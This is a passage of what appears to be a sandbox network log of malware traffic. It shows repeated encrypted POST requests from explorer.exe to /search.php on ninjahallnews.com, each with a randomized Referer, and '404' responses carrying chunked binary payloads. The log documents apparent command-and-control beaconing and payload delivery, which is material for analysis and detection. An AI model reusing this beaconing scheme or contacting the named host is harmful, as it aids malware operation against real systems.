    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 61435 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:22 UTC | 286 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://mjqditygumcpl.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 286
  Host: ninjahallnews.com
2024-10-08 16:24:22 UTC | 286 | OUT | Data Raw: [286-byte POST body; hex and ASCII dump not reproduced]
2024-10-08 16:24:22 UTC | 278 | IN | HTTP/1.1 200 OK
  Date: Tue, 08 Oct 2024 16:24:22 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 0
  Content-Type: text/html; charset=utf-8
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 61436 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:23 UTC | 288 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://xmqdemcyeborscy.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 114
  Host: ninjahallnews.com
2024-10-08 16:24:23 UTC | 114 | OUT | Data Raw: [114-byte POST body; hex and ASCII dump not reproduced]
2024-10-08 16:24:23 UTC | 278 | IN | HTTP/1.1 200 OK
  Date: Tue, 08 Oct 2024 16:24:23 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 0
  Content-Type: text/html; charset=utf-8
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 61437 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:24 UTC | 287 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://ivdqbkwbkfcqmd.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 281
  Host: ninjahallnews.com
2024-10-08 16:24:24 UTC | 281 | OUT | Data Raw: [281-byte POST body; hex and ASCII dump not reproduced]
2024-10-08 16:24:24 UTC | 278 | IN | HTTP/1.1 200 OK
  Date: Tue, 08 Oct 2024 16:24:24 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 0
  Content-Type: text/html; charset=utf-8
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 61438 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:25 UTC | 285 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://kygmejbuqfed.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 209
  Host: ninjahallnews.com
2024-10-08 16:24:25 UTC | 209 | OUT | Data Raw: [209-byte POST body; hex and ASCII dump not reproduced]
2024-10-08 16:24:26 UTC | 278 | IN | HTTP/1.1 200 OK
  Date: Tue, 08 Oct 2024 16:24:25 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 0
  Content-Type: text/html; charset=utf-8
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 61439 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:27 UTC | 287 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://oearusgjpsibxo.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 366
  Host: ninjahallnews.com
2024-10-08 16:24:27 UTC | 366 | OUT | Data Raw: [366-byte POST body; hex and ASCII dump not reproduced]
2024-10-08 16:24:27 UTC | 278 | IN | HTTP/1.1 200 OK
  Date: Tue, 08 Oct 2024 16:24:27 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 0
  Content-Type: text/html; charset=utf-8
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 61440 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:27 UTC | 289 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://bkkawsblriievtha.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 256
  Host: ninjahallnews.com
2024-10-08 16:24:28 UTC | 256 | OUT | Data Raw: [256-byte POST body; hex and ASCII dump not reproduced]
2024-10-08 16:24:28 UTC | 278 | IN | HTTP/1.1 200 OK
  Date: Tue, 08 Oct 2024 16:24:28 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 0
  Content-Type: text/html; charset=utf-8
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 61441 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:28 UTC | 287 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://cdxudjgvudlubb.com/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 112
  Host: ninjahallnews.com
2024-10-08 16:24:28 UTC | 112 | OUT | Data Raw: [112-byte POST body; hex and ASCII dump not reproduced]
2024-10-08 16:24:29 UTC | 278 | IN | HTTP/1.1 200 OK
  Date: Tue, 08 Oct 2024 16:24:29 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 0
  Content-Type: text/html; charset=utf-8
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 61442 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:29 UTC | 289 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://mdlgxwobmimrfsiq.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 139
  Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:29 UTC | 139 | OUT | Data Raw: (opaque binary POST body; hex and ASCII dumps removed)
                                                                                                                          2024-10-08 16:24:30 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:29 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          11 | 192.168.2.6 | 61443 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-08 16:24:30 UTC | 285 | OUT | POST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://kdihkbbguxoo.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 264
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:30 UTC | 264 | OUT | Data Raw: (opaque binary POST body; hex and ASCII dumps removed)
                                                                                                                          2024-10-08 16:24:30 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:30 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          12 | 192.168.2.6 | 61444 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-08 16:24:31 UTC | 286 | OUT | POST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://kwisrrqgrmlvi.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 176
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:31 UTC | 176 | OUT | Data Raw: (opaque binary POST body; hex and ASCII dumps removed)
                                                                                                                          2024-10-08 16:24:32 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:32 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          13 | 192.168.2.6 | 61445 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-08 16:24:32 UTC | 287 | OUT | POST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://ntbrsmlnvptwiq.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 262
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:32 UTC | 262 | OUT | Data Raw: (opaque binary POST body; hex and ASCII dumps removed)
                                                                                                                          2024-10-08 16:24:33 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:32 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          14 | 192.168.2.6 | 61446 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-08 16:24:33 UTC | 287 | OUT | POST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://iymhwcsxyfccua.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 344
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:33 UTC | 344 | OUT | Data Raw: (opaque binary POST body; hex and ASCII dumps removed)
                                                                                                                          2024-10-08 16:24:34 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:33 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          15 | 192.168.2.6 | 61447 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-08 16:24:35 UTC | 286 | OUT | POST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://pyvpiskjnabcb.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 310
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:35 UTC | 310 | OUT | Data Raw: (opaque binary POST body; hex and ASCII dumps removed)
                                                                                                                          2024-10-08 16:24:35 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:35 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          16 | 192.168.2.6 | 61448 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-08 16:24:36 UTC | 284 | OUT | POST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://ndvftlyrsws.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 353
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:36 UTC | 353 | OUT | Data Raw: (opaque binary POST body; hex and ASCII dumps removed)
                                                                                                                          2024-10-08 16:24:36 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:36 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          17 | 192.168.2.6 | 61449 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-08 16:24:36 UTC | 288 | OUT | POST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://vsqfnosbtpkyeiw.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 291
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:36 UTC291OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 65 34 01 83 b7 25 93 3c 58 c1 05 b6 87 c7 5a 40 b7 2f 12 eb 46 86 d0 74 75 c9 28 50 7e a4 cc ed 41 f1 ec 11 07 80 be 28 87 2c 25 ba 87 6b 0f 25 1c 3e 03 e4 6c c1 f9 ab 46 fd 94 3e 2c 39 8f 02 2d a1 47 6f 90 cb b1 b8 20 7d d3 42 a7 7c 83 1a 21 d0 5a 8b 5f 3a 3a 3d 67 ab ed 6b ed ab 71 ee 57 0e ce be b8 38 b3 eb 47 f1 b3 98 9b 23 6c 87 86 ba 06 59 aa 57 2d 8b 6c 13 2a 8b 7f 3c 61 e7 48 1f 02 d9 d7 9a 61 4c be da 23 a1 21 cc d5 c3 68 30 20 7c ce 00 69 4d 29 7a ed 50 fd c9 7e 0f 64 66 15 80 b1 48 2d 51 0f de fe ec 13 f0 a3 1e d0 5b 90 93 c9 8b 77 99 4c
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Le4%<XZ@/Ftu(P~A(,%k%>lF>,9-Go }B|!Z_::=gkqW8G#lYW-l*<aHaL#!h0 |iM)zP~dfH-Q[wL
2024-10-08 16:24:37 UTC | 294 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 08 Oct 2024 16:24:37 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Type: text/html; charset=utf-8
    Connection: close
    Transfer-Encoding: chunked
                                                                                                                          2024-10-08 16:24:37 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 5b 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                                                          Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU[44A:F=
2024-10-08 16:24:37 UTC | 19 | IN | Data Raw: 1a 58 b3 14 d0 ff ef 1b ab d5 44 9d a9 19 24 1b 3c de a6
    Data Ascii: XD$<
2024-10-08 16:24:37 UTC | 2 | IN | Data Raw: 0d 0a
    Data Ascii:
                                                                                                                          2024-10-08 16:24:37 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                                                                          Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
2024-10-08 16:24:37 UTC | 6 | IN | Data Raw: 4e 13 8c ae b0 c7
    Data Ascii: N
2024-10-08 16:24:37 UTC | 2 | IN | Data Raw: 0d 0a
    Data Ascii:
                                                                                                                          2024-10-08 16:24:37 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b0 80 d9 81 f6 4b 57 1e 8f 04 5f c4 c0 88 47 ee 18 f5 d8 ff a1 a2 c6 ae 36 1a 9d e0 fb 7a 50 95 22 b5 51 4d 25 b1 f4 18 0c 15 d1 06 0a 15 7b 23 d8 b9 63 41 09 53 8b 61 24 04 92 dd b9 c9 34 db 29 b1 d3 b5 7d 9b b6 ff 21 7f 68 a3 a1 98 ca f2 df ce 52 bb f4 67 4b 05 db df 01 f6 41 65 c4 8c 63 3c 95 b8 4a 79 8f 0e fc ec 98 91 1c 6c 75 27 c8 43 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 67 b6 ef 85 11 52 c9 bf 4e b0 d6 66 9d d8 30 3f 8d 93 5a f5 d5 f3 5f 31 3d a5 2e 45 85 49 21 aa 61 86 37 f7 f5 9a 70 4c 4d f9 1c fb e1 fe d1 ee cb fa 02 71 1e 89 dd 8a 35
                                                                                                                          Data Ascii: 20007KW_G6zP"QM%{#cASa$4)}!hRgKAec<Jylu'CUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vgRNf0?Z_1=.EI!a7pLMq5
2024-10-08 16:24:37 UTC | 6 | IN | Data Raw: eb 47 a6 2d 95 51
    Data Ascii: G-Q
2024-10-08 16:24:37 UTC | 2 | IN | Data Raw: 0d 0a
    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 61450 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:38 UTC | 288 | OUT | POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://viuhsicxwcdmbdc.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 342
    Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:38 UTC342OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 65 34 01 83 b6 25 93 3c 3c fb 7d bb b5 d2 56 0a e7 6f 0b e8 59 fb c8 73 79 eb 3b 3e 7c da f9 99 54 eb d2 13 78 c5 e4 4a e8 42 38 88 fb 6a 15 41 48 30 06 93 71 ba f1 d0 46 cf fa 74 68 33 f2 5b 2c ec 37 4b 9b d4 84 d7 38 28 cc 7f ce 52 aa 17 4c 81 01 be 4a 7f 64 7b 48 bd cd 42 a1 ac 13 c1 3e 70 99 cf 80 55 c6 86 53 e9 a5 ef cc 33 51 8e 8f 9e 06 2d af 60 28 fa 0a 55 38 e5 3a 1d 38 d8 11 1e 5d eb 8b dd 6d 3b 89 e7 17 8b 58 89 cc da 03 65 6d 34 b1 4d 7c 10 3b 65 ed 09 e0 be 1a 33 25 21 1e 9d bf 40 62 4f 3f 9b e9 e7 57 f7 d2 1f 94 41 c3 e4 da 88 73 95 68
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[ALe4%<<}VoYsy;>|TxJB8jAH0qFth3[,7K8(RLJd{HB>pUS3Q-`(U8:8]m;Xem4M|;e3%!@bO?WAsh
2024-10-08 16:24:38 UTC | 287 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 08 Oct 2024 16:24:38 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Length: 409
    Content-Type: text/html; charset=utf-8
    Connection: close
                                                                                                                          2024-10-08 16:24:38 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 61451 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:39 UTC | 286 | OUT | POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://phumebsddarvf.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 296
    Host: ninjahallnews.com
